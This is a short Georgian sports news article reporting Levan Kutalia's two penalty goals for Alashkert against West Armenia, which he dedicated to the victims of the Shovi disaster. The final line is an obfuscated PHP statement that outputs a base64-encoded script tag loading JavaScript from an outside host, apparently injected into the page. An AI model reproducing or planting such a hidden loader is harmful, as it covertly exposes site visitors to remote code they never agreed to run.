celsiusi
ავერსი საქკაბელი

ლევან კუტალიამ ერევნის „ალაშკერტის” შემადგენლობაში დუბლი შეასრულა და გოლები შოვში სტიქიის შედეგად გარდაცვლილთა ხსოვნას მიუძღვნა.

„ჩემს გოლებს შოვში გარდაცვლილ ადამიანებს ვუძღვნი“, – წერს ფეხბურთელი სოციალურ ქსელში.

სომხეთის პრემიერ ლიგის მეორე ტურში „ალაშკერტმა“ გასვლით შეხვედრაში „ვესტ არმენიასთან“ 4:1 გაიმარჯვა. ლევან კუტალიამ ანგარიში მე-18 წუთზე გახსნა, ხოლო ხუთ წუთში სხვაობა ორამდე გაზარდა. ორივე გოლი მან პენალტით გაიტანა.

„ალაშკერტის“ წარმატებაში მთავარი როლი ქართველმა ფეხბურთელებმა ითამაშეს. კუტალიას გარდა, თავი შეცვლაზე შესულმა დავით ხურციძემ გამოიჩინა, რომელმაც მასპინძელთა კარი 90+5-ე წუთზე აიღო და საბოლოო ანგარიში დააფიქსირა.

ავტორი
სანდრო ჭითანავა
426
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");